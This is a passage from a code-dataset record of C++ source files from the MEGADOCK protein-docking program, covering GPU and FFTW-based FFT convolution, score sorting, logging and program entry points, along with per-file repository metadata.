_controls[myid2]->prepare(_docking_pair.rec_file, _docking_pair.lig_file, _docking_pair.out_file);\r\n }\r\n _controls[myid2]->execute();\r\n\r\n gettimeofday(&et2[myid2],NULL);\r\n\r\n const float elapsed_time = (et2[myid2].tv_sec-et1[myid2].tv_sec + (float)((et2[myid2].tv_usec-et1[myid2].tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n\r\n#pragma omp critical (output)\r\n {\r\n printf(\"# ========================================\\n\");\r\n _exec_loggers[myid2]->output(myid2);\r\n printf(\"Elapsed time = %8.2f sec.\\n\"\r\n \"# ========================================\\n\"\r\n ,elapsed_time);\r\n }\r\n }\r\n\r\n#pragma omp parallel for\r\n for (int i = 0; i < nproc2; i++) {\r\n delete _exec_loggers[i];\r\n delete _controls[i];\r\n delete _parallels[i];\r\n delete _parameters[i];\r\n }\r\n\r\n gettimeofday(&et4,NULL);\r\n\r\n const float total_time = (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\r\n printf(\"\\n\");\r\n printf(\"Total time = %8.2f sec.\\n\",total_time);\r\n}\r\n\r\n//============================================================================//\r\n#ifdef MPI_DP\r\nint application(int argc,char *argv[])\r\n#else\r\nint main(int argc, char *argv[])\r\n#endif\r\n//============================================================================//\r\n{\r\n bool table_input_flag = false, pdb_input_flag = false;\r\n for (int num = 0; num < argc; ++num) {\r\n if (!(strncmp(argv[num], \"-R\", 2) && strncmp(argv[num], \"-L\", 2) && strncmp(argv[num], \"-o\", 2))) {\r\n pdb_input_flag = true;\r\n } else if (!strncmp(argv[num], \"-I\", 2)) {\r\n table_input_flag = true;\r\n } else if (!strncmp(argv[num], \"-h\", 2)) {\r\n usage();\r\n }\r\n }\r\n if (pdb_input_flag) {\r\n if (table_input_flag) {\r\n fprintf(stderr, \"[ERROR] A pair of PDB files and a docking pair list file cannot be specified simultaneously.\\n\");\r\n usage();\r\n } else {\r\n main_pdb(argc, argv);\r\n }\r\n } else {\r\n if (table_input_flag) {\r\n main_table(argc, argv);\r\n } else {\r\n fprintf(stderr, \"[ERROR] A pair of PDB files or a docking pair list file has to be specified.\\n\");\r\n usage();\r\n }\r\n }\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.4005347490310669, "alphanum_fraction": 0.4064171016216278, "avg_line_length": 28.21875, "blob_id": "b6623919d4e61b38308a6b58d85c362f643d9322", "content_id": "7d978d69be2ac8751b4fd77a4cbddd189448768d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1870, "license_type": "permissive", "max_line_length": 80, "num_lines": 64, "path": "/megadock-scfa20/fft_process.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcess\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process.h\"\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.cu\"\n\n#endif\n\n//============================================================================//\nbool ascending_struct(const SortScore &s1,const SortScore &s2) // for sort\n//============================================================================//\n{\n return s1.score > s2.score;\n}\n\n//============================================================================//\ntemplate<class P> void FFTProcess<P>::sort_index(float *fwork,int *iwork)\n//============================================================================//\n{\n const int no = _parameter->_Num_output;\n const int nt = (_Top.size() < no) ? _Top.size() : no;\n\n partial_sort(_Top.begin(),_Top.begin()+nt,_Top.end(),\n ascending_struct);\n\n return;\n}\n\n//============================================================================//\ntemplate<class P> void FFTProcess<P>::top_score_clean()\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n for( int j = 0 ; j < num_toprank ; j++ ) {\n _Top[j].score = 0.0;\n }\n\n return;\n}\n\n// explicit instantiations\ntemplate class FFTProcess<ParameterPDB>;\ntemplate class FFTProcess<ParameterTable>;\n" }, { "alpha_fraction": 0.5891410112380981, "alphanum_fraction": 0.5931928753852844, "avg_line_length": 23.68000030517578, "blob_id": "dbcb1027a902def17c4c8f25a31f346328a917d9", "content_id": "fb71102eba0cd1d9d335d1d8778d8e362d1555ed", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1234, "license_type": "permissive", "max_line_length": 80, "num_lines": 50, "path": "/megadock-scfa20/control_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ControlPDB_h\n#define ControlPDB_h 1\n\n#include \"control.h\"\n#include \"cpu_time.h\"\n#include \"parameter_pdb.h\"\n#include \"docking.h\"\n\nusing namespace std;\n\nclass ControlPDB : public Control<ParameterPDB, DockingPDB>\n{\nprivate:\n CPUTime *_cputime;\nprotected:\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table);\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table);\n virtual void checkgridr();\n virtual void checkgridl();\npublic:\n ControlPDB(CPUTime *pcputime,Parallel *pparallel)\n : _cputime(pcputime),Control<ParameterPDB, DockingPDB>(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ControlPDB.\\n\";\n#endif\n }\n virtual ~ControlPDB() {\n#ifdef DEBUG\n cout << \"Destructing ControlPDB.\\n\";\n#endif\n }\n virtual void initialize(int argc,char *argv[]);\n virtual void execute();\n};\n\n#endif\n" }, { "alpha_fraction": 0.4781523048877716, "alphanum_fraction": 0.49126091599464417, "avg_line_length": 31.363636016845703, "blob_id": "151689ae44fd8791f357ff39b272a6eb5d32b7e5", "content_id": "2a5986868443eca8b202dbdecffe12f95afdc68d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3204, "license_type": "permissive", "max_line_length": 121, "num_lines": 99, "path": "/megadock-scfa20/application.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Application\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"application.h\"\n\n//============================================================================//\nvoid Application::initialize()\n//============================================================================//\n{\n#ifdef CUFFT\n checkCudaErrors( cudaGetDeviceCount(&device_count_gpu) );\n if (device_count_gpu == 0) {\n fprintf(stderr, \"GPU Error: no devices supporting CUDA.\\n\");\n exit(-1);\n }\n\n cudaDeviceProp deviceProp;\n checkCudaErrors( cudaGetDeviceProperties(&deviceProp, 0));\n if (deviceProp.major < 1) {\n fprintf(stderr, \"GPU Error: device does not support CUDA.\\n\");\n exit(-1);\n }\n\n cudaSetDeviceFlags(cudaDeviceMapHost);\n fprintf(stdout, \"# Using CUDA device %d: %s\\n\", 0, deviceProp.name);\n cudaSetDevice(0);\n //fprintf(stdout, \"# Init CUDA device OK.\\n\");\n\n int cufft_version;\n cufftGetVersion(&cufft_version);\n printf(\"# CUFFT version : %d\\n\", cufft_version);\n\n printf(\"# Number of available [threads / GPUs] : [%d / %d]\\n\",nproc2,device_count_gpu);\n#endif\n\n _parallels = new Parallel*[nproc2];\n _exec_loggers = new ExecLogger*[nproc2];\n _controls = new ControlTable*[nproc2];\n _parameters = new ParameterTable*[nproc2];\n\n for (int i = 0; i < nproc2; i++) {\n _parallels[i] = new Parallel(nproc2);\n _parallels[i]->num_gpu(device_count_gpu);\n _exec_loggers[i] = new ExecLogger();\n\n // ParameterTable\n _parameters[i] = new ParameterTable(_parallels[i]);\n if (i == 0) {\n _parameters[i]->initialize();\n } else {\n _parameters[i]->initialize(_parameters[0]);\n }\n _exec_loggers[i]->record_malloc(_parameters[i]->allocate_size()); //Rotation angles[], Atom radius, charge, ACE[]\n\n _controls[i] = new ControlTable(_exec_loggers[i],_parallels[i],_parameters[i]);\n _controls[i]->initialize(i == 0);\n }\n}\n\n//============================================================================//\nint Application::application(int argc, char *argv[], int myid2)\n//============================================================================//\n{\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n _exec_loggers[myid2]->initialize();\n#pragma omp critical\n {\n _parameters[myid2]->process_args(argc, argv);\n _controls[myid2]->prepare();\n }\n _controls[myid2]->execute();\n\n gettimeofday(&et2,NULL);\n\n const float elapsed_time = (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n printf(\"\\n\");\n\n#pragma omp critical\n {\n printf(\"# ========================================\\n\");\n _exec_loggers[myid2]->output(myid2);\n printf(\"Elapsed time = %8.2f sec.\\n\"\n \"# ========================================\\n\"\n ,elapsed_time);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5599473118782043, "alphanum_fraction": 0.5638998746871948, "avg_line_length": 20.685714721679688, "blob_id": "f3b2f7d1bfcefb4d720ace0bda71d8c1e9b63f0d", "content_id": "4961e1cfe32566cc55d6fd27fa3146694955daff", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1518, "license_type": "permissive", "max_line_length": 80, "num_lines": 70, "path": "/megadock-scfa20/exec_logger.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ExecLogger\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Exec_logger_h\n#define Exec_logger_h 1\n\n#include <stdio.h>\n#include <string>\n#include <iostream>\n\n#include \"cpu_time.h\"\n\nusing namespace std;\n\nclass ExecLogger\n{\nprivate:\n ExecLogger(ExecLogger &c) {}\n const ExecLogger & operator=(const ExecLogger &c);\n\npublic:\n CPUTime *_cputime;\n long double mb;\n\n#ifdef CUFFT\n size_t devmem_free, devmem_total, devmem_use;\n#endif\n\n string _RLOut_file;\n int _Num_fft_flag;\n string rec_filename, lig_filename;\n float rec_max_size, lig_max_size;\n float rec_voxel_size, lig_voxel_size;\n int rec_num_grid, lig_num_grid;\n float grid_width;\n\n ExecLogger() {\n#ifdef DEBUG\n cout << \"Constructing ExecLogger.\\n\";\n#endif\n _cputime = new CPUTime();\n }\n virtual ~ExecLogger() {\n#ifdef DEBUG\n cout << \"Destructing ExecLogger\\n\";\n#endif\n delete _cputime;\n }\n virtual void initialize();\n virtual void output(const int myid2);\n virtual void record_malloc(const int &size) {\n _cputime->record_malloc(size);\n }\n virtual void record_free(const int &size) {\n _cputime->record_free(size);\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.5178565979003906, "alphanum_fraction": 0.5487224459648132, "avg_line_length": 39.81644821166992, "blob_id": "c1a1de34752cfb5782e8476c9f8caa5eab4e673b", "content_id": "6cb2de1b42aed8aac1f92f4f5e7e1977175fb912", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 34245, "license_type": "permissive", "max_line_length": 272, "num_lines": 839, "path": "/megadock-scfa20/fft_process_pdb.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"fft_process_pdb.h\"\n\n#define NUM_THREADS 512 //should be power of 2\n\n#ifdef CUFFT\n\n#include \"cuda_kernel.h\"\n\n#endif\n\n//============================================================================//\nvoid FFTProcessPDB::alloc_array(const int &num_fft)\n//============================================================================//\n{\n //cout << \"FFT::alloc_array |\" <<num_fft<< endl; cout.flush();\n _Num_fft = num_fft;\n\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int num_sort = _parameter->_Num_sort;\n const int num_angle = _parameter->_Num_rot_angles;\n const int no = _parameter->_Num_output;\n const size_t nproc2 = _parallel->nproc2();\n int num_toprank;\n\n num_toprank = num_angle * num_sort;\n if( no > num_toprank ) num_toprank = no;\n\n alloc_fft();\n\n _Select.resize(nproc2);\n for( int i = 0 ; i < nproc2 ; i++ ) {\n _Select[i].resize(num_sort);\n }\n\n _Top.resize(num_toprank);\n\n //---------- memory allocation for _Current_rot_angle_num\n _Current_rot_angle_num = new int[nproc2];\n\n _cputime->record_malloc( sizeof(float)*nf3*2*(1 + nproc2));\n\n //---------- memory allocation for _FFT_rec_r\n _FFT_rec_r = new float[nf3];\n if( !_FFT_rec_r ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_r) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n //---------- memory allocation for _FFT_rec_i\n _FFT_rec_i = new float[nf3];\n if( !_FFT_rec_i ) {\n cerr << \"[ERROR] Out of memory. Number of listed receptors = (\"\n << nf3 << \") for (_FFT_rec_i) in fft_process.cpp!!\\n\";\n exit(1);\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::alloc_fft()\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const int na = _ligand->num_atoms();\n size_t myid2;\n\n#ifdef CUFFT\n const int num_sort = _parameter->_Num_sort;\n const int ng1 = _Num_fft / 2;\n const int ng3 = ng1 * ng1 * ng1;\n const int nag = na * ng1;\n //for ligand voxelization on GPU\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n CUFFTin_host = new cufftComplex[nf3];\n CUFFTout_host = new cufftComplex[nf3];\n\n _cputime->record_malloc( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n\n //printf(\" start: %p\\n\",&CUFFTin_host[0].x);\n\n /*\n for( int i = 0 ; i < nf3; i++ ) { // This initialization should be executed only once\n if(i<20)printf(\" %p %p\\n\",&CUFFTin_host[i].x,&CUFFTin_host[i].y);\n if(i>nf3-20)printf(\" %p %p\\n\",&CUFFTin_host[i].x,&CUFFTin_host[i].y);\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n CUFFTin_host[i].x = 0.0;\n CUFFTin_host[i].y = 0.0;\n }\n //*/\n\n int lenCUFFTin_host = (int)(((long int)&CUFFTin_host[nf3-1].x) - ((long int)&CUFFTin_host[0].x) + sizeof(CUFFTin_host[nf3-1]))/sizeof(CUFFTin_host[nf3-1]);\n if(lenCUFFTin_host !=nf3) printf(\"# discontinuous memory allocation occurs\\n\");\n\n //printf(\" end: %ld\\n\",(long long int)&CUFFTin_host[nf3-1].y - &CUFFTin_host[0].x);\n\n cufft_plan = new cufftHandle[num_gpu];\n cufft_result = new cufftResult[num_gpu];\n\n CUFFTin_gpu = new cufftComplex*[num_gpu];\n CUFFTout_gpu = new cufftComplex*[num_gpu];\n _FFT_rec_r_gpu = new float*[num_gpu];\n _FFT_rec_i_gpu = new float*[num_gpu];\n\n grid_r_gpu = new float*[num_gpu];\n grid_i_gpu = new float*[num_gpu];\n grid_coord_gpu = new float*[num_gpu];\n radius_core2_gpu = new float*[num_gpu];\n radius_surf2_gpu = new float*[num_gpu];\n _Charge_gpu = new float*[num_gpu];\n xd_gpu = new float*[num_gpu];\n yd_gpu = new float*[num_gpu];\n zd_gpu = new float*[num_gpu];\n atom_coord_rotated_gpu = new float*[num_gpu];\n atom_coord_orig_gpu = new float*[num_gpu];\n mole_center_coord_gpu = new float*[num_gpu];\n ligand_rotation_angle_gpu = new float*[num_gpu];\n top_score_gpu = new float*[num_gpu];\n top_index_gpu = new int*[num_gpu];\n top_score_host = new float*[num_gpu];\n top_index_host = new int*[num_gpu];\n\n\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n cufft_result[gpu_id] = cufftPlan3d(&cufft_plan[gpu_id], nf1, nf1, nf1, CUFFT_C2C);\n\n checkCudaErrors( cudaMalloc((void **)&CUFFTin_gpu[gpu_id], sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&CUFFTout_gpu[gpu_id], sizeof(cufftComplex)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_r_gpu[gpu_id], sizeof(float)*nf3) );\n checkCudaErrors( cudaMalloc((void **)&_FFT_rec_i_gpu[gpu_id], sizeof(float)*nf3) );\n\n checkCudaErrors( cudaMalloc((void **)&grid_r_gpu[gpu_id], sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_i_gpu[gpu_id], sizeof(float)*ng3));\n checkCudaErrors( cudaMalloc((void **)&grid_coord_gpu[gpu_id], sizeof(float)*ng1));\n checkCudaErrors( cudaMalloc((void **)&radius_core2_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&radius_surf2_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&_Charge_gpu[gpu_id], sizeof(float)*na));\n checkCudaErrors( cudaMalloc((void **)&xd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&yd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&zd_gpu[gpu_id], sizeof(float)*nag));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_rotated_gpu[gpu_id], sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&atom_coord_orig_gpu[gpu_id], sizeof(float)*na*3));\n checkCudaErrors( cudaMalloc((void **)&mole_center_coord_gpu[gpu_id], sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&ligand_rotation_angle_gpu[gpu_id], sizeof(float)*3));\n checkCudaErrors( cudaMalloc((void **)&top_score_gpu[gpu_id], sizeof(float)*nBlocks_nf3*num_sort) );\n checkCudaErrors( cudaMalloc((void **)&top_index_gpu[gpu_id], sizeof(int)*nBlocks_nf3*num_sort) );\n\n top_score_host[gpu_id] = new float[nBlocks_nf3];\n top_index_host[gpu_id] = new int[nBlocks_nf3];\n\n }\n\n _cputime->record_malloc( sizeof(float)*nBlocks_nf3*num_gpu + sizeof(int)*nBlocks_nf3*num_gpu );\n\n //*\n size_t devmem_use, devmem_free, devmem_total;\n cudaMemGetInfo(&devmem_free, &devmem_total);\n devmem_use = devmem_total - devmem_free;\n printf(\"# GPU Memory : Use %3.1f MB (%4.1f%%), Free %3.1f MB (%4.1f%%), Total %3.1f MB\\n\",(float)devmem_use/1024.0/1024.0,(float)(100*devmem_use/devmem_total), (float)devmem_free/1024.0/1024.0, (float)(100*devmem_free/devmem_total), (float)devmem_total/1024.0/1024.0);\n //*/\n\n#endif /* CUFFT */\n\n _FFTWin = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3*nproc2);\n _FFTWout = (fftwf_complex*) fftwf_malloc(sizeof(fftwf_complex)*nf3*nproc2);\n\n plan_fftw_forward = new fftwf_plan[nproc2];\n plan_fftw_inverse = new fftwf_plan[nproc2];\n\n #pragma omp parallel private(myid2) num_threads(nproc2) //limit num of procs\n {\n myid2 = omp_get_thread_num();\n #pragma omp for\n for(int id = 0; id < nproc2; id++) {\n #pragma omp critical\n {\n plan_fftw_forward[myid2]=fftwf_plan_dft_3d(nf1,nf1,nf1,&_FFTWin[nf3*myid2],&_FFTWout[nf3*myid2],FFTW_FORWARD,FFTW_ESTIMATE);\n plan_fftw_inverse[myid2]=fftwf_plan_dft_3d(nf1,nf1,nf1,&_FFTWin[nf3*myid2],&_FFTWout[nf3*myid2],FFTW_BACKWARD,FFTW_ESTIMATE);\n }\n }\n }\n\n _cputime->record_malloc( sizeof(fftwf_complex)*nf3*2*nproc2 );\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::receptor_fft(float *grid_r,float *grid_i)\n//============================================================================//\n{\n const int num_grid= _Num_fft / 2;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - num_grid ) / 2;\n const float theta = -2.0 * PI / _Num_fft;\n\n const int num_gpu = _parallel->num_gpu();\n\n if(num_gpu > 0) {\n#ifdef CUFFT\n int myid2;\n struct timeval et1, et2;\n //memset(CUFFTin_host[0], make_cuComplex(0.0, 0.0), sizeof(cufftComplex)*nf3);\n for( int i = 0 ; i < nf3 ; i++ ) {\n CUFFTin_host[i] = make_cuComplex(0.0, 0.0);\n }\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n for( int k = 0 ; k < num_grid ; k++ ) {\n CUFFTin_host[jc+k+ndata] = make_cuComplex(grid_r[m ], grid_i[m]);\n m++;\n }\n }\n }\n\n cudaSetDevice(0); //CUFFTin_dev[0] : [0] means 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(CUFFTin_gpu[0], CUFFTin_host, sizeof(cufftComplex)*nf3, cudaMemcpyHostToDevice) );\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n fft3d(theta,0); // [0] means performed on 0th GPU\n\n gettimeofday(&et1,NULL);\n checkCudaErrors( cudaMemcpy(CUFFTout_host,CUFFTout_gpu[0],sizeof(cufftComplex)*nf3,cudaMemcpyDeviceToHost) );\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = cuCrealf(CUFFTout_host[i]);\n _FFT_rec_i[i] = cuCimagf(CUFFTout_host[i]);\n }\n\n gettimeofday(&et1,NULL);\n\n #pragma omp parallel private(myid2) num_threads(num_gpu)\n {\n myid2 = omp_get_thread_num();\n #pragma omp for\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(myid2);\n checkCudaErrors( cudaMemcpy(_FFT_rec_r_gpu[myid2], _FFT_rec_r, sizeof(float)*nf3, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(_FFT_rec_i_gpu[myid2], _FFT_rec_i, sizeof(float)*nf3, cudaMemcpyHostToDevice) );\n }\n }\n\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_rec += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n#endif\n } else {\n memset(_FFTWin, 0.0, sizeof(fftwf_complex)*nf3);\n\n for( int i = 0, m = 0 ; i < num_grid ; i++ ) {\n const int ic = _Num_fft*_Num_fft*(i+ndata);\n\n for( int j = 0 ; j < num_grid ; j++ ) {\n const int jc = ic + _Num_fft*(j+ndata);\n\n for( int k = 0 ; k < num_grid ; k++ ) {\n _FFTWin[jc+k+ndata][0] = grid_r[m ];\n _FFTWin[jc+k+ndata][1] = grid_i[m++];\n }\n }\n }\n\n fft3d(theta,0);\n\n for( int i = 0 ; i < nf3 ; i++ ) {\n _FFT_rec_r[i] = _FFTWout[i][0];\n _FFT_rec_i[i] = _FFTWout[i][1];\n }\n }\n\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_preparation(float *grid_r,float *grid_i, size_t myid2)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int nf2 = _Num_fft * _Num_fft;\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n const int ndata = ( _Num_fft - ng1 ) / 2;\n \n memset(_FFTWin[nf3*myid2], 0.0, sizeof(fftwf_complex)*nf3);\n \n for( int i = 0, m = 0 ; i < ng1 ; i++ ) {\n const int ic = nf2*(i+ndata);\n\n for( int j = 0 ; j < ng1 ; j++ ) {\n int jc = ic + _Num_fft*(j+ndata);\n \n for( size_t k = 0, myijk=nf3*myid2+jc+ndata ; k < ng1 ; k++, myijk++ ) {\n _FFTWin[myijk][0] = grid_r[m ];\n _FFTWin[myijk][1] = grid_i[m++];\n }\n }\n }\n \n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::convolution(size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1*nf1;\n const size_t nf3 = nf1*nf2;\n\n for( size_t i = 0, j=nf3*myid2 ; i < nf3 ; i++,j++ ) {\n _FFTWin[j][0] = _FFT_rec_r[i]*_FFTWout[j][0] + _FFT_rec_i[i]*_FFTWout[j][1];\n _FFTWin[j][1] = _FFT_rec_r[i]*_FFTWout[j][1] - _FFT_rec_i[i]*_FFTWout[j][0];\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::fft3d(const float &theta, size_t myid2)\n//============================================================================//\n{ \n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n struct timeval et3, et4;\n\n if(myid2 < num_gpu) {\n#ifdef CUFFT\n const int nf1 = _Num_fft;\n cufftHandle plan;\n cufftResult res;\n\n res = cufftPlan3d(&plan, nf1, nf1, nf1, CUFFT_C2C);\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to plan 3d FFT (DFT):\" << res << endl;\n exit(-1);\n }\n\n if( theta < 0.0 ) {\n res = cufftExecC2C(plan, &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_FORWARD);\n } else {\n res = cufftExecC2C(plan, &CUFFTin_gpu[myid2][0], &CUFFTout_gpu[myid2][0], CUFFT_INVERSE);\n }\n\n if(!res == CUFFT_SUCCESS) {\n cout << \"!fail to exec 3d FFT(in fft3d()):\" << res << endl;\n exit(-1);\n }\n\n res = cufftDestroy(plan);\n#endif\n } else {\n gettimeofday(&et3,NULL);\n if( _parameter->fft_library_type == 2 ) { \n\t} else {\n if( theta < 0.0 ) {\n fftwf_execute(plan_fftw_forward[myid2]);\n } else {\n fftwf_execute(plan_fftw_inverse[myid2]);\n }\n }\n gettimeofday(&et4,NULL);\n //printf(\" [FFT(host),%s] %10.5f\\n\\n\",((theta<0.0)?\"Forward\":\"Inverse\"),(et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6)));\n }\n\n return;\n}\n\n//============================================================================//\nvoid FFTProcessPDB::score_sort(size_t myid2)\n//============================================================================//\n{\n const int num_sort = _parameter->_Num_sort;\n const int nf2 = _Num_fft * _Num_fft;\n const int nf3 = _Num_fft * _Num_fft * _Num_fft;\n float temp_top_score;\n int temp_top_index;\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Select[myid2][i].score = -99999.0;\n }\n\n fftwf_complex *fftout;\n fftout = _FFTWout;\n \n if(num_sort!=1) {\n for( size_t i = 0,myi= nf3*myid2 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0] / nf3;\n if( raw < _Select[myid2][num_sort-1].score) continue;\n for( int j = 0 ; j < num_sort ; j++ ) {\n if( raw > _Select[myid2][j].score ) {\n for( int k = num_sort-1 ; k > j ; k-- ) {\n _Select[myid2][k] = _Select[myid2][k-1];\n }\n _Select[myid2][j].score = raw;\n _Select[myid2][j].index[1] = i / nf2;\n _Select[myid2][j].index[2] = (i / _Num_fft) % _Num_fft;\n _Select[myid2][j].index[3] = i % _Num_fft;\n break;\n }\n }\n }\n } else { // num_sort = 1, take only 1 score per angle\n temp_top_score = 0.0;\n temp_top_index = 0;\n for( size_t i = 0, myi=nf3*myid2 ; i < nf3 ; i++,myi++ ) {\n const float raw = fftout[myi][0];\n if (temp_top_score < raw) {\n temp_top_score = raw;\n temp_top_index = i;\n }\n }\n _Select[myid2][0].score = temp_top_score / nf3;\n _Select[myid2][0].index[1] = temp_top_index / nf2;\n _Select[myid2][0].index[2] = (temp_top_index / _Num_fft) % _Num_fft;\n _Select[myid2][0].index[3] = temp_top_index % _Num_fft;\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n //printf(\" top %d %f\\n\",i,_Select[myid2][i].score);\n _Select[myid2][i].index[0] = _Current_rot_angle_num[myid2];\n }\n\n for( int i = 0 ; i < num_sort ; i++ ) {\n _Top[_Current_rot_angle_num[myid2]*num_sort+i] = _Select[myid2][i];\n }\n\n return;\n}\n\n#ifdef CUFFT\n//============================================================================//\nvoid FFTProcessPDB::cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2)\n//============================================================================//\n{\n const int nf1 = _Num_fft;\n const int nf2 = nf1 * nf1;\n const size_t nf3 = nf2 * nf1;\n\n const int num_sort = _parameter->_Num_sort;\n const int na = _ligand->num_atoms();\n\n struct timeval et1, et2;\n struct timeval et3, et4;\n if(myid2==0) gettimeofday(&et1,NULL);\n\n float temp_top_score = -999999.0;\n int temp_top_index = -999999;\n\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n if(nBlocks_nf3 * nThreads < nf3) {\n printf(\" nf3:%d, nBlocks_nf3:%d, nThreads:%d , 